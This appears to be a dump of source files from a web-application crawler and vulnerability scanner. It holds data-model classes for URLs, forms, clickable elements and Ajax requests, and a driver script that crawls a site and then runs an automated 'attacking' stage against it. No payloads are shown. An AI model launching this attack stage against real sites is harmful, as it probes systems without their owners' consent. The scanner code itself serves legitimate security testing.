    # From here you have nothing to chance. Except you want no attacking, then comment out the lines down
    logging.info("Crawler started...")
    # dropping=True discards any previous database for this run name.
    database_manager = DatabaseManager(user, dropping=True)
    crawler = Crawler(crawl_config=crawler_config, database_manager=database_manager)#, proxy="localhost", port=8082)
    crawler.crawl(user)
    logging.info("Crawler finished")

    # If you want no attacking comment out the lines below.
    logging.info("Start attacking...")
    attack_config = AttackConfig(url)
    attacker = Attacker(attack_config, database_manager=database_manager)#, proxy="localhost", port=8082)
    attacker.attack(user)
    logging.info("Finish attacking...")
--------------------------------------------------------------------------------
/crawler/models/__init__.py:
--------------------------------------------------------------------------------
'''
Copyright (C) 2015 Constantin Tschuertz

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see .
'''
--------------------------------------------------------------------------------
/crawler/models/ajaxrequest.py:
--------------------------------------------------------------------------------
'''
Copyright (C) 2015 Constantin Tschuertz

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see .
16 | ''' 17 | 18 | import hashlib 19 | from models.asyncrequests import AsyncRequests 20 | 21 | 22 | class AjaxRequest(AsyncRequests): 23 | ''' 24 | Models an Ajax-Request issued by an event 25 | ''' 26 | def __init__(self, method, url, trigger, parameters=None): 27 | super(AjaxRequest, self).__init__(method, url, parameters) 28 | self.trigger = trigger 29 | 30 | def toString(self): 31 | msg = "[Ajax - Methode: " + self.method + " - Url: "+ self.url.toString() + " - Trigger: " + self.trigger.toString() + " \n" 32 | for param_pair in self.parameters if self.parameters is not None else []: 33 | msg += " - Parameter pair: " + str(param_pair) 34 | return msg 35 | 36 | def __eq__(self, other): 37 | if not isinstance(other, self.__class__): 38 | return False 39 | try: 40 | url = self.url.complete_url 41 | except AttributeError: 42 | url = self.url 43 | try: 44 | o_url = other.url.complete_url 45 | except AttributeError: 46 | o_url = other.url 47 | 48 | return self.method == other.method and url == o_url and self.trigger == other.trigger 49 | 50 | def __neg__(self): 51 | return not self.__eq__() 52 | 53 | -------------------------------------------------------------------------------- /crawler/models/asyncrequests.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 
16 | ''' 17 | 18 | 19 | import hashlib 20 | class AsyncRequests(): 21 | 22 | def __init__(self, method, url, parameters=None): 23 | self.method = method 24 | self.url = url 25 | self.request_structure = None 26 | self.structure = None 27 | 28 | self.parameters = parameters 29 | if not isinstance(self.parameters, dict) and self.parameters is not None: 30 | self.handle_parameters() 31 | 32 | @property 33 | def request_hash(self): 34 | try: 35 | return self.get_hash() 36 | except AttributeError: 37 | raise AttributeError("You need first to analyze url") 38 | 39 | 40 | def handle_parameters(self): 41 | try: 42 | key_value_pairs = self.parameters.split("&") 43 | tmp = {} 44 | for key_value_pair in key_value_pairs: 45 | try: 46 | key, value = key_value_pair.split("=") 47 | except ValueError: 48 | continue 49 | tmp[key] = value 50 | tmp = sorted(tmp.items()) 51 | self.parameters = {} 52 | for key, val in tmp: 53 | self.parameters[key] = val 54 | except AttributeError: 55 | self.parameters = None 56 | 57 | def get_hash(self): 58 | s_to_hash = self.url.abstract_url + "+" + self.method 59 | try: 60 | for k in [x[0] for x in self.parameters]: 61 | s_to_hash += "++" + k 62 | except TypeError: 63 | pass 64 | b_to_hash = s_to_hash.encode("utf-8") 65 | d = hashlib.md5() 66 | d.update(b_to_hash) 67 | return d.hexdigest() -------------------------------------------------------------------------------- /crawler/models/asyncrequeststructure.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 
8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | class AsyncRequestStructure(): 19 | 20 | def __init__(self, structure_hash, parameters= None): 21 | self.structure_hash = structure_hash 22 | self.parameters = parameters -------------------------------------------------------------------------------- /crawler/models/clickable.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 
16 | ''' 17 | 18 | import hashlib 19 | from models.clickabletype import ClickableType 20 | 21 | 22 | class Clickable(): 23 | ''' 24 | Models interesting element with events as attributes 25 | ''' 26 | 27 | def __init__(self, event, tag, dom_address, id = None, html_class = None, clickable_depth = None, function_id = None): 28 | self.event = event 29 | self.tag = tag 30 | self.dom_address = dom_address 31 | self.id = id 32 | self.html_class = html_class 33 | self.links_to = None 34 | self.clicked = False 35 | self.clickable_type = None 36 | self.clickable_depth = clickable_depth 37 | self.function_id = function_id 38 | 39 | def toString(self): 40 | msg = "" 41 | msg += "[TAG: " + self.tag 42 | if self.id is not None and not self.id == "": 43 | msg += " - ID: " + self.id 44 | if self.event is not None and not self.event == "": 45 | msg += " - Event: " + self.event 46 | if self.html_class is not None and not self.html_class == "": 47 | msg += " - Class: " + self.html_class 48 | msg += " - Domaddress: " + self.dom_address 49 | if self.links_to is not None: 50 | msg += " - Links to: " + self.links_to 51 | if self.clickable_depth is not None: 52 | msg += " - Clickable Depth: " + str(self.clickable_depth) 53 | if self.function_id is not None: 54 | msg += " - FunctionID: " + self.function_id 55 | if self.clickable_type is not None: 56 | if self.clickable_type == ClickableType.CreatesNewNavigatables: 57 | msg += " - ClickableType: CreateNewNavigatable" 58 | elif self.clickable_type == ClickableType.Link: 59 | msg += " - ClickableType: Link" 60 | elif self.clickable_type == ClickableType.SendingAjax: 61 | msg += " - ClickableType: SendingAjax" 62 | elif self.clickable_type == ClickableType.UIChange: 63 | msg += " - ClickableType: UiChange" 64 | elif self.clickable_type == ClickableType.Error: 65 | msg += " - ClickableType: Error" 66 | elif self.clickable_type == ClickableType.IgnoredByCrawler: 67 | msg += " - ClickableType: IgnoredByCrawler" 68 | elif self.clickable_type == 
ClickableType.UnsupportedEvent: 69 | msg += " - ClickableType: UnsupportedEvent" 70 | else: 71 | msg += " - ClickableType: Unknown" 72 | msg += "]" 73 | return msg 74 | 75 | def __eq__(self, other): 76 | if not isinstance(other, self.__class__): 77 | return False 78 | if self.clickable_type is not None and other.clickable_type is not None: 79 | return self.dom_address == other.dom_address and self.event == other.event and self.clickable_type == other.clickable_type and self.links_to == other.links_to 80 | else: 81 | return self.dom_address == other.dom_address and self.event == other.event and self.links_to == other.links_to 82 | 83 | def __hash__(self): 84 | s_to_hash = self.toString() 85 | return hash(s_to_hash) 86 | 87 | 88 | def __ne__(self, other): 89 | return not self.__eq__(other) 90 | 91 | def similar(self, other): 92 | if not isinstance(other, self.__class__): 93 | return False 94 | if self == other: 95 | return True 96 | elif self.html_class == other and self.id == other.id and self.event == other.event and levenshtein < 4: 97 | return True 98 | else: 99 | return False -------------------------------------------------------------------------------- /crawler/models/clickabletype.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 
16 | ''' 17 | 18 | from enum import Enum 19 | 20 | class ClickableType(Enum): 21 | UIChange = 0 22 | Link = 1 23 | CreatesNewNavigatables = 2 24 | Error = 3 25 | SendingAjax = 4 26 | IgnoredByCrawler = 5 27 | UnsupportedEvent = 6 28 | CreateNewWindow = 7 -------------------------------------------------------------------------------- /crawler/models/deltapage.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 
16 | ''' 17 | 18 | 19 | from models.webpage import WebPage 20 | 21 | class DeltaPage(WebPage): 22 | 23 | def __init__(self, id, url = None, html = None, cookiesjar = None, depth = None, generator = None, parent_id = None, delta_depth = None, base_url = None): 24 | WebPage.__init__(self, id, url, html, cookiesjar, depth, base_url=base_url) 25 | self.generator = generator 26 | self.generator_requests = [] 27 | self.parent_id = parent_id 28 | self.delta_depth = delta_depth 29 | 30 | def toString(self): 31 | msg = "[ Page: " + str(self.url) + " - ID: " + str(self.id) + " - Depth:" + str(self.current_depth) +" \n" 32 | msg += "Parent-ID: " + str(self.parent_id) + " - Generator: " + self.generator.toString() + " - Delta Depth: " + str(self.delta_depth) + " \n" 33 | if len(self.generator_requests) > 0: 34 | msg += "Generator AsyncRequests: \n" 35 | for r in self.generator_requests: 36 | msg += " - " + r.toString() + " \n" 37 | if len(self.clickables) > 0: 38 | msg += "Clickable: \n" 39 | for elem in self.clickables: 40 | msg += elem.toString() + " \n" 41 | if len(self.timing_requests) > 0: 42 | msg += "Timingrequests: \n" 43 | for elem in self.timing_requests: 44 | msg += elem.toString() + " \n" 45 | if len(self.links) > 0: 46 | msg += "Static Links: \n" 47 | for link in self.links: 48 | tmp = link.toString() 49 | msg += tmp + " \n" 50 | if len(self.forms) > 0: 51 | msg += "Forms: \n" 52 | for elem in self.forms: 53 | msg += elem.toString() + " \n" 54 | return msg + "]" 55 | 56 | 57 | -------------------------------------------------------------------------------- /crawler/models/enumerations.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 
8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | from enum import Enum 18 | 19 | class XHRBehavior(Enum): 20 | IgnoreXHR = 0 21 | ObserveXHR = 1 22 | InterceptXHR = 2 23 | -------------------------------------------------------------------------------- /crawler/models/form.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 
16 | ''' 17 | 18 | 19 | import hashlib 20 | 21 | 22 | class HtmlForm(): 23 | def __init__(self, parameters, action, method, dom_address=None): 24 | self.parameter = parameters # Array of FormInput's 25 | self.parameter = sorted(self.parameter, key=lambda parameter: parameter.name if parameter.name is not None else "") 26 | self.action = action 27 | self.method = method 28 | self.dom_address = dom_address 29 | 30 | @property 31 | def form_hash(self): 32 | return self.get_hash() 33 | 34 | def toString(self): 35 | msg = "[Form: Action: '" + self.action.abstract_url + "' Method:' " + self.method + " - Formhash: " + self.get_hash() + " \n" 36 | if self.dom_address is not None: 37 | msg += "Dom Address: " + self.dom_address + " \n" 38 | for elem in self.parameter: 39 | msg += "[Param: " + str(elem.tag) + " Name: " + str(elem.name) + " Inputtype: " + str( 40 | elem.input_type) + " Values: " + str(elem.values) + "] \n" 41 | return msg + "]" 42 | 43 | def hasSubmit(self): 44 | return self.submit != None 45 | 46 | def __eq__(self, other): 47 | if not isinstance(other, self.__class__): 48 | return False 49 | return self.get_hash() == other.get_hash() 50 | 51 | def __ne__(self, other): 52 | return not self.__eq__(other) 53 | 54 | def get_hash(self): 55 | s_to_hash = self.action.abstract_url + ";" + self.method + ";" 56 | for p in self.parameter: 57 | s_to_hash += str(p.name) + ";" + p.tag + ";" + str(p.input_type) + ";" 58 | b_to_hash = s_to_hash.encode("utf-8") 59 | d = hashlib.md5() 60 | d.update(b_to_hash) 61 | return d.hexdigest() 62 | 63 | 64 | class FormInput(): 65 | def __init__(self, tag, name, input_type="", values=None): 66 | self.tag = tag 67 | self.name = name 68 | self.values = values 69 | self.input_type = input_type 70 | 71 | def __eq__(self, other): 72 | if not isinstance(other, self.__class__): 73 | return False 74 | if self.values is not None: 75 | for val in self.values: 76 | if other.values is None or not val in other.values: 77 | return False 78 | return 
self.tag == other.tag and self.name == other.name and self.input_type == other.input_type 79 | 80 | def __ne__(self, other): 81 | return not self.__eq__(other) 82 | 83 | def toString(self): 84 | return "[Param: " + str(self.tag) + " Name: " + str(self.name) + " Inputtype: " + str( 85 | self.input_type) + " Values: " + str(self.values) + "] \n" 86 | 87 | 88 | class InputField(): 89 | def __init__(self, input_type, html_id=None, html_class=None, value=None): 90 | self.input_type = input_type 91 | self.html_id = html_id 92 | self.html_class = html_class 93 | self.value = value # Predifiend value, if available... 94 | -------------------------------------------------------------------------------- /crawler/models/keyclickable.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 
16 | ''' 17 | 18 | from models.clickable import Clickable 19 | from models.clickabletype import ClickableType 20 | 21 | class KeyClickable(Clickable): 22 | 23 | def __init__(self, clickable, key_event): 24 | Clickable.__init__(self, clickable.event, clickable.tag, clickable.dom_address, clickable.id, clickable.html_class, clickable.clickable_depth, clickable.function_id) 25 | self.random_char = key_event #Is the key typed in for triggering the clickabel 26 | 27 | def toString(self): 28 | msg = "" 29 | msg += "[TAG: " + self.tag 30 | if self.id is not None and not self.id == "": 31 | msg += " - ID: " + self.id 32 | if self.event is not None and not self.event == "": 33 | msg += " - Event: " + self.event 34 | if self.html_class is not None and not self.html_class == "": 35 | msg += " - Class: " + self.html_class 36 | msg += " - Domadress: " + self.dom_address 37 | if self.links_to is not None: 38 | msg += " - Links to: " + self.links_to 39 | if self.clickable_depth is not None: 40 | msg += " - Clickable Depth: " + str(self.clickable_depth) 41 | if self.function_id is not None: 42 | msg += " - FunctionID: " + self.function_id 43 | if self.clickable_type is not None: 44 | if self.clickable_type == ClickableType.CreatesNewNavigatables: 45 | msg += " - ClickableType: Create_new_navigatable" 46 | elif self.clickable_type == ClickableType.Link: 47 | msg += " - ClickableType: Link" 48 | elif self.clickable_type == ClickableType.SendingAjax: 49 | msg += " - ClickableType: SendingAjax" 50 | elif self.clickable_type == ClickableType.UIChange: 51 | msg += " - ClickableType: UiChange" 52 | elif self.clickable_type == ClickableType.Error: 53 | msg += " - ClickableType: Error" 54 | if self.random_char is not None: 55 | msg += self.random_char 56 | msg += "]" 57 | return msg -------------------------------------------------------------------------------- /crawler/models/link.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright 
(C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | class Link(): 19 | 20 | def __init__(self, url, dom_address, html_id = "", html_class = ""): 21 | self.url = url 22 | self.dom_address = dom_address 23 | self.html_id = html_id 24 | self.html_class = html_class 25 | 26 | def toString(self): 27 | res = "[" 28 | res += "A-HREF: " + self.url.abstract_url + " - {}".format(self.url.url_hash) 29 | res += " - Domadress: " + self.dom_address 30 | if self.html_id != "": 31 | res += " - ID: " + self.html_id 32 | if self.html_class != "": 33 | res += " - Class: " + self.html_class 34 | res += "]" 35 | return res 36 | 37 | def __eq__(self, other): 38 | if not isinstance(other, self.__class__): 39 | return False 40 | return self.url == other.url 41 | 42 | def __ne__(self, other): 43 | return not self.__eq__(other) 44 | -------------------------------------------------------------------------------- /crawler/models/parametertype.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 
class ParameterType(Enum):
    """
    Classification of a URL/request parameter value:
    - Digit: a single digit, e.g. 0, 1, 2, ...
    - Float: a floating point value, e.g. 1.5, 99.32, 3.1415, ...
    - Char: a single character (letter or digit), e.g. a, B, X, 5, ...
    - Integer: an integer with more than one digit, e.g. 23, 39, 42, ...
    - String: contains only letters, e.g. Turing, CaptainJack
    - AlphaNumerical: everything else (mixed letters and digits),
      e.g. diofjiodjr23jreß9324jr3j0ew9rj
    - NoParameter: the URL carries no parameter at all
    """
    Digit = 0
    Float = 1
    Char = 2
    Integer = 3
    String = 4
    AlphaNumerical = 5
    NoParameter = 6
from models.asyncrequests import AsyncRequests


class TimingRequest(AsyncRequests):
    '''
    Models an Ajax request that is issued after a timeout or an interval.
    '''

    def __init__(self, method, url, time, event, parameters=None):
        super().__init__(method, url, parameters)
        self.event = event  # trigger kind - presumably "Timeout" or "Interval"; TODO confirm
        self.time = time    # the timeout/interval duration

    def toString(self):
        """Return a one-line textual description of this timing request."""
        return "[Timing - Method: {} - Url: {} - Trigger: {}]".format(
            str(self.method), str(self.url.toString()), str(self.event))
import hashlib
from urllib.parse import urlparse


class Url():
    """
    Wraps a concrete URL and splits it into scheme, domain, path, query
    parameters and fragment.

    Two urls share the same url_hash when they have the same path and the
    same set of parameter *names* (values are deliberately ignored, see
    get_hash()).
    """

    def __init__(self, url, depth_of_finding = None):
        self.complete_url = url
        parsed_url = urlparse(url)
        self.scheme = parsed_url.scheme
        self.domain = parsed_url.netloc
        # A bare "/" path is normalized to the empty string.
        if parsed_url.path != "/":
            self.path = parsed_url.path
        else:
            self.path = ""
        self.query = parsed_url.query
        self.fragment = parsed_url.fragment

        self.parameters = {}                      # name -> list of values (a name may repeat)
        self.depth_of_finding = depth_of_finding  # crawl depth at which this url was found
        self.url_structure = None                 # filled in later by the domain handler
        self.abstract_url = None

        if len(parsed_url.query) > 0:
            for pair in self.query.split("&"):
                tmp = pair.split("=")
                if len(tmp) == 2:
                    param_name = tmp[0]
                    param_value = tmp[1]
                else:
                    # No "=" (or more than one): record the name without a value.
                    param_name = tmp[0]
                    param_value = None
                if param_name in self.parameters:
                    self.parameters[param_name].append(param_value)
                else:
                    self.parameters[param_name] = [param_value]
            # Rebuild the dict in sorted key order so that iteration (and
            # therefore the hash below) does not depend on the order of the
            # parameters inside the query string.
            self.parameters = {key: self.parameters[key]
                               for key in sorted(self.parameters)}

        self.url_hash = self.get_hash()

    def get_values_to_parameter(self, parameter_name):
        """Return the list of values seen for parameter_name.

        Raises:
            KeyError: if the parameter does not exist in this url.
        """
        if parameter_name not in self.parameters:
            raise KeyError("{} is not in parameters".format(parameter_name))
        return self.parameters[parameter_name]

    def get_url_description(self):
        """Return the (possibly still None) UrlStructure of this url."""
        return self.url_structure

    def get_path(self):
        """Return "scheme://domain/path", or "" when the url has no path."""
        if self.path is not None and len(self.path) > 0:
            if self.path[0] == "/":
                return self.scheme + "://" + self.domain + self.path
            return self.scheme + "://" + self.domain + "/" + self.path
        return ""

    def get_hash(self):
        """MD5 over the path plus the (sorted) parameter names.

        Parameter *values* are intentionally excluded, so urls that differ
        only in values hash alike.
        """
        s_to_hash = self.path
        for k in self.parameters:
            s_to_hash += "++" + k
        d = hashlib.md5()
        d.update(s_to_hash.encode("utf-8"))
        return d.hexdigest()

    def toString(self):
        return self.complete_url

    def has_equal_description(self, other):
        """True if other is a Url with the same structural hash.

        Bug fix: this used to access ``self.___class__`` (three underscores),
        which raised AttributeError on every call.
        """
        if not isinstance(other, self.__class__):
            return False
        return self.url_hash == other.url_hash

    def equal_abstract_url(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.abstract_url == other.abstract_url

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.toString() == other.toString()

    def __ne__(self, other):
        return not self.__eq__(other)
class UrlStructure():
    """
    Abstract description of a url: its path plus, for every parameter, the
    parameter type, its origin and whether changing its value generates a
    new page.
    """

    def __init__(self, path, paramters = None, url_hash = None):
        self.path = path
        # Bug fix: the old signature used a mutable default argument
        # (paramters = {}), which is shared between all instances.
        # Dict of dicts: name -> {parameter_type, origin, generating};
        # "generating" means a change of the param creates a new page.
        self.parameters = paramters if paramters is not None else {}
        self.url_hash = url_hash

    def get_parameter_type(self, parameter_name):
        """Return the ParameterType of parameter_name (KeyError if unknown)."""
        if parameter_name not in self.parameters:
            raise KeyError("{} not found".format(parameter_name))
        return ParameterType(self.parameters[parameter_name]['parameter_type'])

    def get_parameter_origin(self, parameter_name):
        """Return the ParameterOrigin of parameter_name (KeyError if unknown).

        Bug fix: the stored 'origin' value used to be wrapped in
        ParameterType, returning the wrong enum; toString() below already
        decodes 'origin' as ParameterOrigin.
        """
        if parameter_name not in self.parameters:
            raise KeyError("{} not found".format(parameter_name))
        return ParameterOrigin(self.parameters[parameter_name]['origin'])

    def toString(self):
        msg = "[Url: {} \n".format(self.path)
        for param in self.parameters:
            msg += "{} - {} - {} - {} \n".format(
                param,
                ParameterType(self.parameters[param]['parameter_type']),
                ParameterOrigin(self.parameters[param]['origin']),
                self.parameters[param]['generating'])
        msg += "Hash: {}]".format(self.url_hash)
        return msg


class ParameterOrigin(Enum):
    # Whether the parameter value was produced by the server or by
    # client-side JavaScript.
    ServerGenerated = 0
    ClientGenerated = 1
from enum import Enum


def levenshtein(s1, s2):
    """Return the Levenshtein (edit) distance between the strings s1 and s2."""
    # Keep the shorter string second so the DP row stays small.
    if len(s2) > len(s1):
        s1, s2 = s2, s1

    if not s2:
        return len(s1)

    # Classic two-row dynamic programming over edit operations.
    prev = list(range(len(s2) + 1))
    for row, ch1 in enumerate(s1, start=1):
        cur = [row]
        for col, ch2 in enumerate(s2):
            cost_insert = prev[col + 1] + 1
            cost_delete = cur[col] + 1
            cost_subst = prev[col] + (ch1 != ch2)
            cur.append(min(cost_insert, cost_delete, cost_subst))
        prev = cur

    return prev[-1]


class CrawlSpeed(Enum):
    # Interaction speed between jAEk and the JavaScript engine.
    Slow = 0
    Medium = 1
    Fast = 2
    Speed_of_Lightning = 3


def purge_dublicates(X):
    """Remove duplicates from X, keeping the *last* occurrence of each row.

    Works for unhashable rows too (uses membership tests, O(n^2))."""
    return [row for i, row in enumerate(X) if row not in X[i + 1:]]
class WebPage:
    """A crawled web page together with everything extracted from it
    (clickables, links, forms, timing and ajax requests)."""

    def __init__(self, id, url = None, html = None, cookiesjar = None, depth = None, base_url = None):
        self.id = id
        self.cookiejar = cookiesjar
        self.url = url
        self.html = html
        self.clickables = []
        self.timing_requests = []
        self.links = []
        self.forms = []
        self.current_depth = depth   # crawl depth at which the page was reached
        self.ajax_requests = []
        # Bug fix: the base_url argument used to be ignored (always set to
        # None).  Set when a page contains a <base> tag.
        self.base_url = base_url

    def toString(self):
        """Return a multi-line textual dump of the page and its elements."""
        try:
            url = self.url.toString()
        except AttributeError:
            url = self.url  # url may also be a plain string
        msg = "[ Page: " + url + " - ID: " + str(self.id) + " - Depth:" + str(self.current_depth) + " \n"
        if len(self.clickables) > 0:
            msg += "Clickable: \n"
            for elem in self.clickables:
                msg += elem.toString() + " \n"
        if len(self.timing_requests) > 0:
            msg += "Timingrequests: \n"
            for elem in self.timing_requests:
                msg += elem.toString() + " \n"
        if len(self.links) > 0:
            msg += "Static Links: \n"
            for link in self.links:
                msg += link.toString() + " \n"
        if len(self.forms) > 0:
            msg += "Forms: \n"
            for elem in self.forms:
                msg += elem.toString() + " \n"
        if len(self.ajax_requests) > 0:
            msg += "Ajax-AsyncRequests: \n"
            for elem in self.ajax_requests:
                msg += elem.toString() + " \n"
        return msg + "]"
Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | -------------------------------------------------------------------------------- /crawler/network/network.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 
from PyQt5.Qt import QNetworkAccessManager, QDesktopServices, QNetworkDiskCache
import logging
from PyQt5.QtNetwork import QHttpMultiPart, QHttpPart


class NetWorkAccessManager(QNetworkAccessManager):
    """QNetworkAccessManager with an on-disk cache.

    Finished replies are scheduled for deletion immediately so that
    QNetworkReply objects do not accumulate during long crawls.
    """

    def __init__(self, parent, cache_size = 100, cache_dir='.webkit_cache'):
        """cache_size is given in megabytes.

        NOTE(review): .gitignore ignores ".webkit-cache/" (dash) while the
        default here is ".webkit_cache" (underscore) - confirm which spelling
        is intended.
        """
        super(NetWorkAccessManager, self).__init__(parent)
        self.finished.connect(self._finished)
        cache = QNetworkDiskCache()
        cache.setCacheDirectory(cache_dir)
        cache.setMaximumCacheSize(cache_size * 1024 * 1024)  # MB -> bytes
        self.setCache(cache)

    def _finished(self, reply):
        # Release the reply once control returns to the event loop.
        reply.deleteLater()

    def createRequest(self, op, req, device=None):
        # NOTE(review): self.reply is set but never read here - presumably a
        # leftover; kept for backward compatibility with external readers.
        self.reply = None
        return QNetworkAccessManager.createRequest(self, op, req, device)

    # Cleanup: the previous __del__ only rebound the local name `self`
    # (`self = None`), which has no effect, so it was removed together with
    # the large commented-out per-operation logging block.
Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | __author__ = 'constantin' 19 | -------------------------------------------------------------------------------- /crawler/tests/databasetest.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A 